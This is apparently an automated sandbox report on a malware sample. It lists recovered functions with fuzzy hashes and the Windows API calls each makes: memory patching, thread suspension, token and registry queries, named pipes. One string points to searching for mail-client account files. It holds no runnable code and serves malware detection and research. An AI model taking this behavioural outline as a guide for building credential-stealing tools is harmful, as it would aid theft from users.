  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D892D, Relevance: 6.1, APIs: 4, Instructions: 93 Total matches: 207
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE0EE, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 60
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7262, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 95string
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33F3A, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 114
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C7664, Relevance: 6.1, APIs: 4, Instructions: 74 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31395, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71 Total matches: 21memory
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C28FD, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 55registrystring
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D799E, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 87string
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD885, Relevance: 6.1, APIs: 4, Instructions: 61 Total matches: 76memorystring
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7471, Relevance: 6.1, APIs: 4, Instructions: 59 Total matches: 43stringthreadtime
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2554, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4E59, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystring
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2884, Relevance: 6.0, APIs: 4, Instructions: 41 Total matches: 66filestringsynchronization
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBCD2, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 99filesynchronizationpipe
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDF8E, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 105memorythread
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B329FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DD61D, Relevance: 6.0, APIs: 4, Instructions: 29 Total matches: 151sleepmemory
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA895, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7222, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58 Total matches: 58
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
